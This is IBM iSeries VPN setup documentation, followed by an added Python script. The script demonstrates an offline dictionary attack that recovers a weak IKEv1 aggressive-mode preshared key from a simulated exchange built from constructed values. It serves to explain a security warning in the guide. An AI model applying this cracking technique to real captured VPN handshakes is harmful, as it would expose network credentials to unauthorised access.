Configure VPN on iSeries-A

Follow these steps to configure VPN on iSeries-A:

  1. Configure the Internet Key Exchange policy
    1. In iSeries™ Navigator, expand iSeries-A > Network > IP Policies > Virtual Private Networking > IP Security Policies.
    2. Right-click Internet Key Exchange Policies and select New Internet Key Exchange Policy.
    3. On the Remote Server page, select Version 4 IP address as the identifier type and then enter 205.13.237.6 in the IP address field.
    4. On the Associations page, select Preshared key to indicate that this connection uses a preshared key to authenticate this policy.
    5. Enter the preshared key in the Key field. Treat your preshared key like a password.
    6. Select Key Identifier for the local key server identifier type, and then enter the key identifier in the Identifier field. For example, thisisthekeyid. A key identifier is used here because the local key server has a dynamically assigned IP address that cannot be known in advance. iSeries-B uses this identifier to identify iSeries-A when iSeries-A initiates a connection.
    7. On the Transforms page, click Add to add the transforms that iSeries-A proposes to iSeries-B for key protection and to specify whether the IKE policy uses identity protection when initiating phase 1 negotiations.
    8. On the IKE Policy Transform page, select Preshared key for your authentication method, SHA for your hash algorithm, and 3DES-CBC for your encryption algorithm. Accept the default values for Diffie-Hellman group and Expire IKE keys after.
    9. Click OK to return to the Transforms page.
    10. Select IKE aggressive mode negotiation (no identity protection).
      Note: In aggressive mode the hash that authenticates each key server is sent unencrypted, and with preshared key authentication that hash depends only on the preshared key and values an eavesdropper also sees. Anyone who captures the phase 1 exchange can therefore test candidate keys offline. If you use preshared keys and aggressive mode negotiation together, choose a long, random preshared key that cannot be guessed from a dictionary, and change it periodically.
    11. Click OK to save your configurations.
  2. Configure the data policy
    1. From the VPN interface, right-click Data policies and select New Data Policy.
    2. On the General page, specify the name of the data policy. For example, l2tpremoteuser.
    3. Go to the Proposals page. A proposal is the set of protocols and transforms that the initiating and responding key servers use to establish a dynamic connection between two endpoints. One data policy can be used by several connection objects, but not every remote VPN key server supports the same properties, so a data policy can carry several proposals. A connection is established only if at least one proposal in the initiator's data policy matches one in the responder's.
    4. Click Add to add a data policy transform.
    5. Select Transport for the encapsulation mode.
    6. Click OK to return to the Transforms page.
    7. Specify a key expiration value.
    8. Click OK to save your new data policy.
  3. Configure the dynamic-key group
    1. From the VPN interface, expand Secure Connections.
    2. Right-click By Group and select New Dynamic-Key Group.
    3. On the General page, specify a name for the group. For example, l2tptocorp.
    4. Select Protects a locally initiated L2TP tunnel.
    5. For system role, select Both systems are hosts.
    6. Go to the Policy page. Select the data policy you created in the step Configure the data policy, l2tpremoteuser, from the Data policy drop-down list.
    7. Select Local system initiates connection to indicate that only iSeries-A can initiate connections with iSeries-B.
    8. Go to the Connections page. Select Generate the following policy filter rule for this group. Click Edit to define the parameters of the policy filter.
    9. On the Policy Filter- Local Addresses page, select Key Identifier for the identifier type.
    10. For the identifier, select the key identifier, thisisthekeyid, that you defined in the IKE policy.
    11. Go to the Policy Filter - Remote Addresses page. Select IP version 4 address from the Identifier type drop-down list.
    12. Enter 205.13.237.6 in the Identifier field.
    13. Go to the Policy Filter - Services page. Enter 1701 in the Local Port and Remote Port fields. Port 1701 is the well-known port for L2TP.
    14. Select UDP from the Protocol drop-down list.
    15. Click OK to return to the Connections page.
    16. Go to the Interfaces page. Select any line or PPP profile to which this group applies. The PPP profile for this group does not exist yet; after you create it in the next step, edit the properties of this group so that it also applies to that profile.
    17. Click OK to create the dynamic-key group, l2tptocorp.
  4. Configure the dynamic-key connection
    1. From the VPN interface, expand By Group. This displays a list of all dynamic-key groups you have configured on iSeries-A.
    2. Right-click l2tptocorp and select New Dynamic-Key Connection.
    3. On the General page, specify an optional description for the connection.
    4. For the remote key server, select Version 4 IP address for the identifier type.
    5. Select 205.13.237.6 from the IP address drop-down list.
    6. Deselect Start on-demand.
    7. Go to the Local Addresses page. Select Key identifier for the identifier type and then select thisisthekeyid from the Identifier drop-down list.
    8. Go to the Remote Addresses page. Select IP version 4 address for the identifier type.
    9. Enter 205.13.237.6 in the Identifier field.
    10. Go to the Services page. Enter 1701 in the Local Port and Remote Port fields. Port 1701 is the well-known port for L2TP.
    11. Select UDP from the Protocol drop-down list.
    12. Click OK to create the dynamic-key connection.
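The note under step 1.10 warns about preshared keys combined with aggressive mode. The following Python script, added here as an illustration and not part of the IBM documentation or of any iSeries code, shows the mechanism: it builds the values an eavesdropper would see in an IKEv1 aggressive-mode exchange between iSeries-A (identified by the key ID thisisthekeyid) and 205.13.237.6, computes HASH_R as RFC 2409 section 5.4 defines it with HMAC-SHA1 (assuming SHA in step 1.8 means SHA-1), and then recovers a weak preshared key with an offline word list. All cookies, nonces, DH values, the SA payload body, the word list and the weak key are constructed for the demo; the ID payload protocol and port values are assumptions.

```python
# Added example, not from the IBM iSeries documentation. It shows why the
# note under step 1.10 (preshared key + aggressive mode) matters: in IKEv1
# aggressive mode (RFC 2409 section 5.4) the responder's HASH_R travels in
# the clear and is computed from the preshared key plus values that an
# eavesdropper also sees, so the key can be attacked offline with a word list.
# Every field below (cookies, nonces, DH values, SA body, word list, weak key)
# is constructed for the demo; nothing here is captured traffic.
import hashlib
import hmac
import os
import socket
import struct
from typing import Optional

ID_IPV4_ADDR = 1   # RFC 2407 identification types
ID_KEY_ID = 11


def id_body(id_type: int, data: bytes, proto: int = 17, port: int = 500) -> bytes:
    # ID payload body without the generic ISAKMP header:
    # type(1) | protocol(1) | port(2) | identification data.
    # Protocol 17 / port 500 are assumed values for the demo.
    return struct.pack("!BBH", id_type, proto, port) + data


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    # SKEYID = prf(pre-shared-key, Ni_b | Nr_b); prf is HMAC-SHA1 when the
    # IKE policy hash algorithm is SHA (assumed to mean SHA-1, step 1.8).
    return hmac.new(psk, ni_b + nr_b, hashlib.sha1).digest()


def hash_r(skeyid: bytes, ex: dict) -> bytes:
    # HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    msg = (ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"]
           + ex["sai_b"] + ex["idir_b"])
    return hmac.new(skeyid, msg, hashlib.sha1).digest()


def build_exchange(psk: bytes) -> dict:
    """Simulate what an eavesdropper between iSeries-A and 205.13.237.6 sees
    in an aggressive-mode exchange: every field is public except the
    preshared key, which only influences HASH_R."""
    ex = {
        "cky_i": os.urandom(8),
        "cky_r": os.urandom(8),
        "gxi": os.urandom(128),   # stand-in for a 1024-bit DH public value
        "gxr": os.urandom(128),
        "ni_b": os.urandom(20),
        "nr_b": os.urandom(20),
        # stand-in bytes, not a real SA payload encoding
        "sai_b": b"\x00\x00\x00\x01" + b"constructed SA payload body",
        # initiator identifies itself by key ID (step 1.6),
        # responder by its IPv4 address (step 1.3)
        "idii_b": id_body(ID_KEY_ID, b"thisisthekeyid"),
        "idir_b": id_body(ID_IPV4_ADDR, socket.inet_aton("205.13.237.6")),
    }
    ex["hash_r"] = hash_r(skeyid_psk(psk, ex["ni_b"], ex["nr_b"]), ex)
    return ex


def crack_psk(ex: dict, wordlist) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R for each candidate key and
    compare with the captured value. No further packets to the peer are needed,
    so rate limiting or lockout on the key server does not help."""
    for cand in wordlist:
        guess = hash_r(skeyid_psk(cand, ex["ni_b"], ex["nr_b"]), ex)
        if hmac.compare_digest(guess, ex["hash_r"]):
            return cand
    return None


if __name__ == "__main__":
    words = [b"password", b"letmein", b"summer2004", b"corp123"]   # constructed
    weak = build_exchange(b"summer2004")      # constructed dictionary word as PSK
    strong = build_exchange(os.urandom(32))   # random 256-bit PSK
    print("weak key recovered:", crack_psk(weak, words))
    print("strong key recovered:", crack_psk(strong, words))
```

A dictionary word is recovered on the first pass over the list, while a random 32-byte key is not found at all; the same computation is what makes main mode safer here, since in main mode the hash payloads are sent only after the exchange is already encrypted.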